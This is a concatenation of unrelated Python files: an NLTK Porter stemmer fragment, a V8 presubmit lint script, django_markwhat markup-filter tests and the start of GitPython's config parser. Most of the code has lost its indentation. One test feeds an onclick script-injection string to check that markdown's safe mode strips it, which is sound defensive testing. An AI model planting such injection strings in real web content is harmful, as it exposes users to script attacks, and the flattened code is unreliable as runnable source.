else: return
elif self.b[self.k - 1] == 'i':
if self.ends("ic"): pass
else: return
elif self.b[self.k - 1] == 'l':
if self.ends("able"): pass
elif self.ends("ible"): pass
else: return
elif self.b[self.k - 1] == 'n':
if self.ends("ant"): pass
elif self.ends("ement"): pass
elif self.ends("ment"): pass
elif self.ends("ent"): pass
else: return
elif self.b[self.k - 1] == 'o':
if self.ends("ion") and (self.b[self.j] == 's' or self.b[self.j] == 't'): pass
elif self.ends("ou"): pass
# takes care of -ous
else: return
elif self.b[self.k - 1] == 's':
if self.ends("ism"): pass
else: return
elif self.b[self.k - 1] == 't':
if self.ends("ate"): pass
elif self.ends("iti"): pass
else: return
elif self.b[self.k - 1] == 'u':
if self.ends("ous"): pass
else: return
elif self.b[self.k - 1] == 'v':
if self.ends("ive"): pass
else: return
elif self.b[self.k - 1] == 'z':
if self.ends("ize"): pass
else: return
else:
return
if self.m() > 1:
self.k = self.j
def step5(self):
"""step5() removes a final -e if m() > 1, and changes -ll to -l if
m() > 1.
"""
self.j = self.k
if self.b[self.k] == 'e':
a = self.m()
if a > 1 or (a == 1 and not self.cvc(self.k-1)):
self.k = self.k - 1
if self.b[self.k] == 'l' and self.doublec(self.k) and self.m() > 1:
self.k = self.k -1
def stem_word(self, p, i=0, j=None):
"""In stem(p,i,j), p is a char pointer, and the string to be stemmed
is from p[i] to p[j] inclusive. Typically i is zero and j is the
offset to the last character of a string, (p[j+1] == '\0'). The
stemmer adjusts the characters p[i] ... p[j] and returns the new
end-point of the string, k. Stemming never increases word length, so
i <= k <= j. To turn the stemmer into a module, declare 'stem' as
extern, and delete the remainder of this file.
"""
## --NLTK--
## Don't print results as we go (commented out the next line)
#print p[i:j+1]
if j is None:
j = len(p) - 1
# copy the parameters into statics
self.b = p
self.k = j
self.k0 = i
if self.b[self.k0:self.k+1] in self.pool:
return self.pool[self.b[self.k0:self.k+1]]
if self.k <= self.k0 + 1:
return self.b # --DEPARTURE--
# With this line, strings of length 1 or 2 don't go through the
# stemming process, although no mention is made of this in the
# published algorithm. Remove the line to match the published
# algorithm.
self.step1ab()
self.step1c()
self.step2()
self.step3()
self.step4()
self.step5()
return self.b[self.k0:self.k+1]
def adjust_case(self, word, stem):
lower = word.lower()
ret = ""
for x in xrange(len(stem)):
if lower[x] == stem[x]:
ret += word[x]
else:
ret += stem[x]
return ret
## --NLTK--
## Don't use this procedure; we want to work with individual
## tokens, instead. (commented out the following procedure)
#def stem(self, text):
# parts = re.split("(\W+)", text)
# numWords = (len(parts) + 1)/2
#
# ret = ""
# for i in xrange(numWords):
# word = parts[2 * i]
# separator = ""
# if ((2 * i) + 1) < len(parts):
# separator = parts[(2 * i) + 1]
#
# stem = self.stem_word(string.lower(word), 0, len(word) - 1)
# ret = ret + self.adjust_case(word, stem)
# ret = ret + separator
# return ret
## --NLTK--
## Define a stem() method that implements the StemmerI interface.
def stem(self, word):
stem = self.stem_word(word.lower(), 0, len(word) - 1)
return self.adjust_case(word, stem)
## --NLTK--
## Add a string representation function
def __repr__(self):
return '<PorterStemmer>'
## --NLTK--
## This test procedure isn't applicable.
#if __name__ == '__main__':
# p = PorterStemmer()
# if len(sys.argv) > 1:
# for f in sys.argv[1:]:
# infile = open(f, 'r')
# while 1:
# w = infile.readline()
# if w == '':
# break
# w = w[:-1]
# print p.stem(w)
##--NLTK--
## Added a demo() function
def demo():
"""
A demonstration of the porter stemmer on a sample from
the Penn Treebank corpus.
"""
from nltk.corpus import treebank
from nltk import stem
stemmer = stem.PorterStemmer()
orig = []
stemmed = []
for item in treebank.files()[:3]:
for (word, tag) in treebank.tagged_words(item):
orig.append(word)
stemmed.append(stemmer.stem(word))
# Convert the results to a string, and word-wrap them.
results = ' '.join(stemmed)
results = re.sub(r"(.{,70})\s", r'\1\n', results+' ').rstrip()
# Convert the original to a string, and word wrap it.
original = ' '.join(orig)
original = re.sub(r"(.{,70})\s", r'\1\n', original+' ').rstrip()
# Print the results.
print('-Original-'.center(70).replace(' ', '*').replace('-', ' '))
print(original)
print('-Results-'.center(70).replace(' ', '*').replace('-', ' '))
print(results)
print('*'*70)
##--NLTK--
if __name__ == "__main__":
import doctest
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
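# A minimal usage sketch (an assumption: the enclosing class is named
# PorterStemmer, as its __repr__ above suggests). It is not wired into the
# module; call it manually to eyeball a few stems.
def _porter_example():
    stemmer = PorterStemmer()
    for word in ("caresses", "ponies", "meetings", "happy", "enjoy"):
        print("%s -> %s" % (word, stemmer.stem(word)))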
|
|
#!/usr/bin/env python
#
# Copyright 2012 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
try:
import hashlib
md5er = hashlib.md5
except ImportError, e:
import md5
md5er = md5.new
import optparse
import os
from os.path import abspath, join, dirname, basename, exists
import pickle
import re
import sys
import subprocess
import multiprocessing
from subprocess import PIPE
# Disabled LINT rules and reason.
# build/include_what_you_use: Started giving false positives for variables
# named "string" and "map" assuming that you needed to include STL headers.
ENABLED_LINT_RULES = """
build/class
build/deprecated
build/endif_comment
build/forward_decl
build/include_alpha
build/include_order
build/printf_format
build/storage_class
legal/copyright
readability/boost
readability/braces
readability/casting
readability/constructors
readability/fn_size
readability/function
readability/multiline_comment
readability/multiline_string
readability/streams
readability/todo
readability/utf8
runtime/arrays
runtime/casting
runtime/deprecated_fn
runtime/explicit
runtime/int
runtime/memset
runtime/mutex
runtime/nonconf
runtime/printf
runtime/printf_format
runtime/rtti
runtime/sizeof
runtime/string
runtime/virtual
runtime/vlog
whitespace/blank_line
whitespace/braces
whitespace/comma
whitespace/comments
whitespace/ending_newline
whitespace/indent
whitespace/labels
whitespace/line_length
whitespace/newline
whitespace/operators
whitespace/parens
whitespace/tab
whitespace/todo
""".split()
# TODO(bmeurer): Fix and re-enable readability/check
LINT_OUTPUT_PATTERN = re.compile(r'^.+[:(]\d+[:)]|^Done processing')
def CppLintWorker(command):
try:
process = subprocess.Popen(command, stderr=subprocess.PIPE)
process.wait()
out_lines = ""
error_count = -1
while True:
out_line = process.stderr.readline()
if out_line == '' and process.poll() != None:
if error_count == -1:
print "Failed to process %s" % command.pop()
return 1
break
m = LINT_OUTPUT_PATTERN.match(out_line)
if m:
out_lines += out_line
error_count += 1
sys.stdout.write(out_lines)
return error_count
except KeyboardInterrupt:
process.kill()
except:
print('Error running cpplint.py. Please make sure you have depot_tools' +
' in your $PATH. Lint check skipped.')
process.kill()
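# Hedged sketch of the command shape handed to CppLintWorker by
# CppLintProcessor.ProcessFiles below: one cpplint.py invocation per source
# file, restricted to the enabled rules. The paths are illustrative only.
def _ExampleLintCommand(cpplint_path, source_file):
  filt = '-,' + ','.join('+' + rule for rule in ENABLED_LINT_RULES)
  return [sys.executable, cpplint_path, '--filter', filt, source_file]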
class FileContentsCache(object):
def __init__(self, sums_file_name):
self.sums = {}
self.sums_file_name = sums_file_name
def Load(self):
try:
sums_file = None
try:
sums_file = open(self.sums_file_name, 'r')
self.sums = pickle.load(sums_file)
except:
# Cannot parse pickle for any reason. Not much we can do about it.
pass
finally:
if sums_file:
sums_file.close()
def Save(self):
try:
sums_file = open(self.sums_file_name, 'w')
pickle.dump(self.sums, sums_file)
except:
# Failed to write pickle. Try to clean-up behind us.
if sums_file:
sums_file.close()
try:
os.unlink(self.sums_file_name)
except:
pass
finally:
sums_file.close()
def FilterUnchangedFiles(self, files):
changed_or_new = []
for file in files:
try:
handle = open(file, "r")
file_sum = md5er(handle.read()).digest()
if not file in self.sums or self.sums[file] != file_sum:
changed_or_new.append(file)
self.sums[file] = file_sum
finally:
handle.close()
return changed_or_new
def RemoveFile(self, file):
if file in self.sums:
self.sums.pop(file)
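# Illustrative round trip for FileContentsCache, mirroring its use in
# CppLintProcessor.ProcessFiles below; the cache file name here is made up.
def _ExampleCacheRoundTrip(file_list):
  cache = FileContentsCache('.example-cache')
  cache.Load()
  changed_or_new = cache.FilterUnchangedFiles(file_list)
  cache.Save()
  return changed_or_new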
class SourceFileProcessor(object):
"""
Utility class that can run through a directory structure, find all relevant
files and invoke a custom check on the files.
"""
def Run(self, path):
all_files = []
for file in self.GetPathsToSearch():
all_files += self.FindFilesIn(join(path, file))
if not self.ProcessFiles(all_files, path):
return False
return True
def IgnoreDir(self, name):
return (name.startswith('.') or
name in ('buildtools', 'data', 'gmock', 'gtest', 'kraken',
'octane', 'sunspider'))
def IgnoreFile(self, name):
return name.startswith('.')
def FindFilesIn(self, path):
result = []
for (root, dirs, files) in os.walk(path):
for ignored in [x for x in dirs if self.IgnoreDir(x)]:
dirs.remove(ignored)
for file in files:
if not self.IgnoreFile(file) and self.IsRelevant(file):
result.append(join(root, file))
return result
class CppLintProcessor(SourceFileProcessor):
"""
Lint files to check that they follow the google code style.
"""
def IsRelevant(self, name):
return name.endswith('.cc') or name.endswith('.h')
def IgnoreDir(self, name):
return (super(CppLintProcessor, self).IgnoreDir(name)
or (name == 'third_party'))
IGNORE_LINT = ['flag-definitions.h']
def IgnoreFile(self, name):
return (super(CppLintProcessor, self).IgnoreFile(name)
or (name in CppLintProcessor.IGNORE_LINT))
def GetPathsToSearch(self):
return ['src', 'include', 'samples',
join('test', 'base-unittests'),
join('test', 'cctest'),
join('test', 'compiler-unittests')]
def GetCpplintScript(self, prio_path):
for path in [prio_path] + os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
cpplint = os.path.join(path, "cpplint.py")
if os.path.isfile(cpplint):
return cpplint
return None
def ProcessFiles(self, files, path):
good_files_cache = FileContentsCache('.cpplint-cache')
good_files_cache.Load()
files = good_files_cache.FilterUnchangedFiles(files)
if len(files) == 0:
print 'No changes in files detected. Skipping cpplint check.'
return True
filt = '-,' + ",".join(['+' + n for n in ENABLED_LINT_RULES])
command = [sys.executable, 'cpplint.py', '--filter', filt]
cpplint = self.GetCpplintScript(join(path, "tools"))
if cpplint is None:
print('Could not find cpplint.py. Make sure '
'depot_tools is installed and in the path.')
sys.exit(1)
command = [sys.executable, cpplint, '--filter', filt]
commands = [command + [file] for file in files]
count = multiprocessing.cpu_count()
pool = multiprocessing.Pool(count)
try:
results = pool.map_async(CppLintWorker, commands).get(999999)
except KeyboardInterrupt:
print "\nCaught KeyboardInterrupt, terminating workers."
sys.exit(1)
for i in range(len(files)):
if results[i] > 0:
good_files_cache.RemoveFile(files[i])
total_errors = sum(results)
print "Total errors found: %d" % total_errors
good_files_cache.Save()
return total_errors == 0
COPYRIGHT_HEADER_PATTERN = re.compile(
r'Copyright [\d-]*20[0-1][0-9] the V8 project authors. All rights reserved.')
class SourceProcessor(SourceFileProcessor):
"""
Check that all files include a copyright notice and no trailing whitespaces.
"""
RELEVANT_EXTENSIONS = ['.js', '.cc', '.h', '.py', '.c',
'.status', '.gyp', '.gypi']
# Overwriting the one in the parent class.
def FindFilesIn(self, path):
if os.path.exists(path+'/.git'):
output = subprocess.Popen('git ls-files --full-name',
stdout=PIPE, cwd=path, shell=True)
result = []
for file in output.stdout.read().split():
for dir_part in os.path.dirname(file).replace(os.sep, '/').split('/'):
if self.IgnoreDir(dir_part):
break
else:
if (self.IsRelevant(file) and os.path.exists(file)
and not self.IgnoreFile(file)):
result.append(join(path, file))
if output.wait() == 0:
return result
return super(SourceProcessor, self).FindFilesIn(path)
def IsRelevant(self, name):
for ext in SourceProcessor.RELEVANT_EXTENSIONS:
if name.endswith(ext):
return True
return False
def GetPathsToSearch(self):
return ['.']
def IgnoreDir(self, name):
return (super(SourceProcessor, self).IgnoreDir(name) or
name in ('third_party', 'gyp', 'out', 'obj', 'DerivedSources'))
IGNORE_COPYRIGHTS = ['cpplint.py',
'daemon.py',
'earley-boyer.js',
'raytrace.js',
'crypto.js',
'libraries.cc',
'libraries-empty.cc',
'jsmin.py',
'regexp-pcre.js',
'gnuplot-4.6.3-emscripten.js']
IGNORE_TABS = IGNORE_COPYRIGHTS + ['unicode-test.js', 'html-comments.js']
def EndOfDeclaration(self, line):
return line == "}" or line == "};"
def StartOfDeclaration(self, line):
return line.find("//") == 0 or \
line.find("/*") == 0 or \
line.find(") {") != -1
def ProcessContents(self, name, contents):
result = True
base = basename(name)
if not base in SourceProcessor.IGNORE_TABS:
if '\t' in contents:
print "%s contains tabs" % name
result = False
if not base in SourceProcessor.IGNORE_COPYRIGHTS:
if not COPYRIGHT_HEADER_PATTERN.search(contents):
print "%s is missing a correct copyright header." % name
result = False
if ' \n' in contents or contents.endswith(' '):
line = 0
lines = []
parts = contents.split(' \n')
if not contents.endswith(' '):
parts.pop()
for part in parts:
line += part.count('\n') + 1
lines.append(str(line))
linenumbers = ', '.join(lines)
if len(lines) > 1:
print "%s has trailing whitespaces in lines %s." % (name, linenumbers)
else:
print "%s has trailing whitespaces in line %s." % (name, linenumbers)
result = False
if not contents.endswith('\n') or contents.endswith('\n\n'):
print "%s does not end with a single new line." % name
result = False
# Check two empty lines between declarations.
if name.endswith(".cc"):
line = 0
lines = []
parts = contents.split('\n')
while line < len(parts) - 2:
if self.EndOfDeclaration(parts[line]):
if self.StartOfDeclaration(parts[line + 1]):
lines.append(str(line + 1))
line += 1
elif parts[line + 1] == "" and \
self.StartOfDeclaration(parts[line + 2]):
lines.append(str(line + 1))
line += 2
line += 1
if len(lines) >= 1:
linenumbers = ', '.join(lines)
if len(lines) > 1:
print "%s does not have two empty lines between declarations " \
"in lines %s." % (name, linenumbers)
else:
print "%s does not have two empty lines between declarations " \
"in line %s." % (name, linenumbers)
result = False
return result
def ProcessFiles(self, files, path):
success = True
violations = 0
for file in files:
try:
handle = open(file)
contents = handle.read()
if not self.ProcessContents(file, contents):
success = False
violations += 1
finally:
handle.close()
print "Total violating files: %s" % violations
return success
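# Hedged example of SourceProcessor.ProcessContents: the first snippet has a
# matching copyright line and clean whitespace, while the second is missing
# the header and carries a trailing space, so it fails those two checks.
def _ExampleProcessContents():
  processor = SourceProcessor()
  clean = ("// Copyright 2014 the V8 project authors."
           " All rights reserved.\nint x;\n")
  dirty = "int x; \n"
  return (processor.ProcessContents("example.cc", clean),
          processor.ProcessContents("example.cc", dirty))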
def CheckGeneratedRuntimeTests(workspace):
code = subprocess.call(
[sys.executable, join(workspace, "tools", "generate-runtime-tests.py"),
"check"])
return code == 0
def CheckExternalReferenceRegistration(workspace):
code = subprocess.call(
[sys.executable, join(workspace, "tools", "external-reference-check.py")])
return code == 0
def GetOptions():
result = optparse.OptionParser()
result.add_option('--no-lint', help="Do not run cpplint", default=False,
action="store_true")
return result
def Main():
workspace = abspath(join(dirname(sys.argv[0]), '..'))
parser = GetOptions()
(options, args) = parser.parse_args()
success = True
print "Running C++ lint check..."
if not options.no_lint:
success = CppLintProcessor().Run(workspace) and success
print "Running copyright header, trailing whitespaces and " \
"two empty lines between declarations check..."
success = SourceProcessor().Run(workspace) and success
success = CheckGeneratedRuntimeTests(workspace) and success
success = CheckExternalReferenceRegistration(workspace) and success
if success:
return 0
else:
return 1
if __name__ == '__main__':
sys.exit(Main())
|
|
# Quick tests for the markup templatetags (django_markwhat)
import re
import unittest
from django.template import Template, Context
from django.utils.html import escape
try:
import textile
except ImportError:
textile = None
try:
import markdown
markdown_version = getattr(markdown, "version_info", 0)
except ImportError:
markdown = None
try:
import CommonMark
except ImportError:
CommonMark = None
try:
import docutils
except ImportError:
docutils = None
class Templates(unittest.TestCase):
textile_content = """Paragraph 1
Paragraph 2 with "quotes" and @code@"""
markdown_content = """Paragraph 1
## An h2"""
markdown_content_with_html_code = """Paragraph 1
## An h2
```
<video width="320" height="240" controls>
<source src="movie.mp4" type="video/mp4">
<source src="movie.ogg" type="video/ogg">
</video>
```
"""
markdown_content_with_iframe_code = """Paragraph 1
## An h2
```
<iframe src="http://example.com"></iframe>
```
"""
rest_content = """Paragraph 1
Paragraph 2 with a link_
.. _link: http://www.example.com/"""
@unittest.skipUnless(textile, 'textile not installed')
def test_textile(self):
t = Template("{% load markup %}{{ textile_content|textile }}")
rendered = t.render(Context(
{'textile_content': self.textile_content})).strip()
self.assertEqual(rendered.replace('\t', ''), """<p>Paragraph 1</p>
<p>Paragraph 2 with “quotes” and <code>code</code></p>""")
@unittest.skipIf(textile, 'textile is installed')
def test_no_textile(self):
t = Template("{% load markup %}{{ textile_content|textile }}")
rendered = t.render(Context(
{'textile_content': self.textile_content})).strip()
self.assertEqual(rendered, escape(self.textile_content))
@unittest.skipUnless(markdown, 'markdown not installed')
def test_markdown(self):
t = Template("{% load markup %}{{ markdown_content|markdown }}")
rendered = t.render(Context({
'markdown_content': self.markdown_content
})).strip()
pattern = re.compile("""<p>Paragraph 1\s*</p>\s*<h2>\s*An h2</h2>""")
self.assertTrue(pattern.match(rendered))
@unittest.skipUnless(markdown, 'markdown not installed')
def test_markdown_html_code(self):
t = Template("{% load markup %}{{ markdown_content|markdown }}")
rendered = t.render(Context({
'markdown_content': self.markdown_content_with_html_code
})).strip()
pattern = re.compile(
'<p>Paragraph 1\s*</p>\s*<h2>\s*An h2</h2>' +
'\s*<p><code>\s*<video width="320"'
)
self.assertTrue(pattern.match(rendered))
@unittest.skipUnless(markdown, 'markdown not installed')
def test_markdown_html_iframe_code(self):
t = Template("{% load markup %}{{ markdown_content|markdown }}")
rendered = t.render(Context({
'markdown_content': self.markdown_content_with_iframe_code
})).strip()
pattern = re.compile(
'<p>Paragraph 1\s*</p>\s*<h2>\s*An h2</h2>' +
'\s*<p><code>\s*<iframe src="http://example.com">' +
'</iframe>'
)
self.assertTrue(pattern.match(rendered))
@unittest.skipUnless(
markdown and markdown_version >= (2, 1),
'markdown >= 2.1 not installed'
)
def test_markdown_attribute_disable(self):
t = Template("{% load markup %}{{ markdown_content|markdown:'safe' }}")
markdown_content = "{@onclick=alert('hi')}some paragraph"
rendered = t.render(Context(
{'markdown_content': markdown_content})).strip()
self.assertTrue('@' in rendered)
@unittest.skipUnless(
markdown and markdown_version >= (2, 1),
'markdown >= 2.1 not installed'
)
def test_markdown_attribute_enable(self):
t = Template("{% load markup %}{{ markdown_content|markdown }}")
markdown_content = "{@onclick=alert('hi')}some paragraph"
rendered = t.render(Context(
{'markdown_content': markdown_content})).strip()
self.assertFalse('@' in rendered)
@unittest.skipIf(markdown, 'markdown is installed')
def test_no_markdown(self):
t = Template("{% load markup %}{{ markdown_content|markdown }}")
rendered = t.render(Context(
{'markdown_content': self.markdown_content})).strip()
self.assertEqual(rendered, self.markdown_content)
@unittest.skipUnless(CommonMark, 'commonmark not installed')
def test_commonmark(self):
t = Template("{% load markup %}{{ markdown_content|commonmark }}")
rendered = t.render(
Context({'markdown_content': self.markdown_content})).strip()
pattern = re.compile("""<p>Paragraph 1\s*</p>\s*<h2>\s*An h2</h2>""")
self.assertTrue(pattern.match(rendered))
@unittest.skipUnless(CommonMark, 'commonmark not installed')
def test_commonmark_html_code(self):
t = Template("{% load markup %}{{ markdown_content|commonmark }}")
rendered = t.render(Context({
'markdown_content': self.markdown_content_with_html_code
})).strip()
pattern = re.compile(
'<p>Paragraph 1\s*</p>\s*<h2>\s*An h2</h2>' +
'\s*<pre><code>\s*<video width="320"'
)
self.assertTrue(pattern.match(rendered))
@unittest.skipUnless(CommonMark, 'commonmark not installed')
def test_commonmark_html_iframe_code(self):
t = Template("{% load markup %}{{ markdown_content|commonmark }}")
rendered = t.render(Context({
'markdown_content': self.markdown_content_with_iframe_code
})).strip()
pattern = re.compile(
'<p>Paragraph 1\s*</p>\s*<h2>\s*An h2</h2>' +
'\s*<pre><code>\s*<iframe ' +
'src="http://example.com">' +
'</iframe>'
)
self.assertTrue(pattern.match(rendered))
@unittest.skipUnless(CommonMark, 'commonmark not installed')
def test_commonmark_empty_str(self):
t = Template("{% load markup %}{{ markdown_content|commonmark }}")
rendered = t.render(Context({'markdown_content': ''})).strip()
self.assertEqual(rendered, '')
@unittest.skipUnless(CommonMark, 'commonmark not installed')
def test_commonmark_none(self):
t = Template("{% load markup %}{{ markdown_content|commonmark }}")
rendered = t.render(Context({'markdown_content': None})).strip()
self.assertEqual(rendered, '<p>None</p>')
@unittest.skipUnless(docutils, 'docutils not installed')
def test_docutils(self):
t = Template("{% load markup %}{{ rest_content|restructuredtext }}")
rendered = t.render(Context({
'rest_content': self.rest_content
})).strip()
# Different versions of docutils return slightly different HTML
try:
# Docutils v0.4 and earlier
self.assertEqual(
rendered,
'<p>Paragraph 1</p>\n' +
'<p>Paragraph 2 with a <a class="reference" ' +
'href="http://www.example.com/">link</a></p>')
except AssertionError:
# Docutils from SVN (which will become 0.5)
self.assertEqual(
rendered,
'<p>Paragraph 1</p>\n' +
'<p>Paragraph 2 with a ' +
'<a class="reference external" ' +
'href="http://www.example.com/">link</a></p>')
@unittest.skipIf(docutils, 'docutils is installed')
def test_no_docutils(self):
t = Template("{% load markup %}{{ rest_content|restructuredtext }}")
rendered = t.render(
Context({'rest_content': self.rest_content})).strip()
self.assertEqual(rendered, self.rest_content)
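# Hedged convenience sketch (not part of the test class above): rendering a
# filter directly. It assumes Django settings are already configured, which
# the test runner normally handles before these templates are built.
def _render_with_markdown(text):
    t = Template("{% load markup %}{{ content|markdown }}")
    return t.render(Context({'content': text})).strip()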
|
|
# config.py
# Copyright (C) 2008, 2009 Michael Trier ([email protected]) and contributors
#
# This module is part of GitPython and is released under
# the BSD License: http://www.opensource.org/licenses/bsd-license.php
"""Module containing module parser implementation able to properly read and write
configuration files"""
import abc
from functools import wraps
import inspect
import logging
import os
import re
from git.compat import (
string_types,
FileType,
defenc,
force_text,
with_metaclass,
PY3
)
from git.odict import OrderedDict
from git.util import LockFile
import os.path as osp
try:
import ConfigParser as cp
except ImportError:
# PY3
import configparser as cp
__all__ = ('GitConfigParser', 'SectionConstraint')
log = logging.getLogger('git.config')
log.addHandler(logging.NullHandler())
class MetaParserBuilder(abc.ABCMeta):
"""Utlity class wrapping base-class methods into decorators that assure read-only properties"""
def __new__(cls, name, bases, clsdict):
"""
Equip all base-class methods with a needs_values decorator, and all non-const methods
with a set_dirty_and_flush_changes decorator in addition to that."""
kmm = '_mutating_methods_'
if kmm in clsdict:
mutating_methods = clsdict[kmm]
for base in bases:
methods = (t for t in inspect.getmembers(base, inspect.isroutine) if not t[0].startswith("_"))
for name, method in methods:
if name in clsdict:
continue
method_with_values = needs_values(method)
if name in mutating_methods:
method_with_values = set_dirty_and_flush_changes(method_with_values)
# END mutating methods handling
clsdict[name] = method_with_values
# END for each name/method pair
# END for each base
# END if mutating methods configuration is set
new_type = super(MetaParserBuilder, cls).__new__(cls, name, bases, clsdict)
return new_type
def needs_values(func):
"""Returns method assuring we read values (on demand) before we try to access them"""
@wraps(func)
def assure_data_present(self, *args, **kwargs):
self.read()
return func(self, *args, **kwargs)
# END wrapper method
return assure_data_present
def set_dirty_and_flush_changes(non_const_func):
"""Return method that checks whether given non constant function may be called.
If so, the instance will be set dirty.
Additionally, we flush the changes right to disk"""
def flush_changes(self, *args, **kwargs):
rval = non_const_func(self, *args, **kwargs)
self._dirty = True
self.write()
return rval
# END wrapper method
flush_changes.__name__ = non_const_func.__name__
return flush_changes
class SectionConstraint(object):
"""Constrains a ConfigParser to only option commands which are constrained to
always use the section we have been initialized with.
It supports all ConfigParser methods that operate on an option.
:note:
If used as a context manager, will release the wrapped ConfigParser."""
__slots__ = ("_config", "_section_name")
_valid_attrs_ = ("get_value", "set_value", "get", "set", "getint", "getfloat", "getboolean", "has_option",
"remove_section", "remove_option", "options")
def __init__(self, config, section):
self._config = config
self._section_name = section
def __del__(self):
# Yes, for some reason, we have to call it explicitly for it to work in PY3 !
# Apparently __del__ doesn't get called anymore if the refcount becomes 0
# Ridiculous ... .
self._config.release()
def __getattr__(self, attr):
if attr in self._valid_attrs_:
return lambda *args, **kwargs: self._call_config(attr, *args, **kwargs)
return super(SectionConstraint, self).__getattribute__(attr)
def _call_config(self, method, *args, **kwargs):
"""Call the configuration at the given method which must take a section name
as first argument"""
return getattr(self._config, method)(self._section_name, *args, **kwargs)
@property
def config(self):
"""return: Configparser instance we constrain"""
return self._config
def release(self):
"""Equivalent to GitConfigParser.release(), which is called on our underlying parser instance"""
return self._config.release()
def __enter__(self):
self._config.__enter__()
return self
def __exit__(self, exception_type, exception_value, traceback):
self._config.__exit__(exception_type, exception_value, traceback)
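# Hedged usage sketch for SectionConstraint: option-level calls are forwarded
# to the wrapped parser with the fixed section name prepended. The file path
# below is purely illustrative.
def _example_section_constraint(path='/tmp/example.gitconfig'):
    parser = GitConfigParser(path, read_only=True)
    core = SectionConstraint(parser, 'core')
    return core.get_value('bare', default=False)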
class GitConfigParser(with_metaclass(MetaParserBuilder, cp.RawConfigParser, object)):
"""Implements specifics required to read git style configuration files.
This variation behaves much like the git.config command such that the configuration
will be read on demand based on the filepath given during initialization.
The changes will automatically be written once the instance goes out of scope, but
can be triggered manually as well.
The configuration file will be locked if you intend to change values preventing other
instances to write concurrently.
:note:
The config is case-sensitive even when queried, hence section and option names
must match perfectly.
If used as a context manager, will release the locked file."""
#{ Configuration
# The lock type determines the type of lock to use in new configuration readers.
# They must be compatible to the LockFile interface.
# A suitable alternative would be the BlockingLockFile
t_lock = LockFile
re_comment = re.compile(r'^\s*[#;]')
#} END configuration
optvalueonly_source = r'\s*(?P<option>[^:=\s][^:=]*)'
OPTVALUEONLY = re.compile(optvalueonly_source)
OPTCRE = re.compile(optvalueonly_source + r'\s*(?P<vi>[:=])\s*' + r'(?P<value>.*)$')
del optvalueonly_source
# list of RawConfigParser methods able to change the instance
_mutating_methods_ = ("add_section", "remove_section", "remove_option", "set")
def __init__(self, file_or_files, read_only=True, merge_includes=True):
"""Initialize a configuration reader to read the given file_or_files and to
possibly allow changes to it by setting read_only False
:param file_or_files:
A single file path or file objects or multiple of these
:param read_only:
If True, the ConfigParser may only read the data, but not change it.
If False, only a single file path or file object may be given. We will write back the changes
when they happen, or when the ConfigParser is released. This will not happen if other
configuration files have been included
:param merge_includes: if True, we will read files mentioned in [include] sections and merge their
contents into ours. This makes it impossible to write back an individual configuration file.
Thus, if you want to modify a single configuration file, turn this off to leave the original
dataset unaltered when reading it."""
cp.RawConfigParser.__init__(self, dict_type=OrderedDict)
# Used in python 3, needs to stay in sync with sections for underlying implementation to work
if not hasattr(self, '_proxies'):
self._proxies = self._dict()
self._file_or_files = file_or_files
self._read_only = read_only
self._dirty = False
self._is_initialized = False
self._merge_includes = merge_includes
self._lock = None
self._acquire_lock()
def _acquire_lock(self):
if not self._read_only:
if not self._lock:
if isinstance(self._file_or_files, (tuple, list)):
raise ValueError(
"Write-ConfigParsers can operate on a single file only, multiple files have been passed")
# END single file check
file_or_files = self._file_or_files
if not isinstance(self._file_or_files, string_types):
file_or_files = self._file_or_files.name
# END get filename from handle/stream
# initialize lock base - we want to write
self._lock = self.t_lock(file_or_files)
# END lock check
self._lock._obtain_lock()
# END read-only check
def __del__(self):
"""Write pending changes if required and release locks"""
# NOTE: only consistent in PY2
self.release()
def __enter__(self):
self._acquire_lock()
return self
def __exit__(self, exception_type, exception_value, traceback):
self.release()
def release(self):
"""Flush changes and release the configuration write lock. This instance must not be used anymore afterwards.
In Python 3, it's required to explicitly release locks and flush changes, as __del__ is not called
deterministically anymore."""
# checking for the lock here makes sure we do not raise during write()
# in case an invalid parser was created who could not get a lock
if self.read_only or (self._lock and not self._lock._has_lock()):
return
try:
try:
self.write()
except IOError:
log.error("Exception during destruction of GitConfigParser", exc_info=True)
except ReferenceError:
# This happens in PY3 ... and usually means that some state cannot be written
# as the sections dict cannot be iterated
# Usually when shutting down the interpreter, don't know how to fix this
pass
finally:
self._lock._release_lock()
def optionxform(self, optionstr):
"""Do not transform options in any way when writing"""
return optionstr
def _read(self, fp, fpname):
"""A direct copy of the py2.4 version of the super class's _read method
to assure it uses ordered dicts. Had to change one line to make it work.
Future versions have this fixed, but in fact it's quite embarrassing for the
guys not to have done it right in the first place !
Removed big comments to make it more compact.
Made sure it ignores initial whitespace as git uses tabs"""
cursect = None # None, or a dictionary
optname = None
lineno = 0
is_multi_line = False
e = None # None, or an exception
def string_decode(v):
if v[-1] == '\\':
v = v[:-1]
# end cut trailing escapes to prevent decode error
if PY3:
return v.encode(defenc).decode('unicode_escape')
else:
return v.decode('string_escape')
# end
# end
while True:
# we assume to read binary !
line = fp.readline().decode(defenc)
if not line:
break
lineno = lineno + 1
# comment or blank line?
if line.strip() == '' or self.re_comment.match(line):
continue
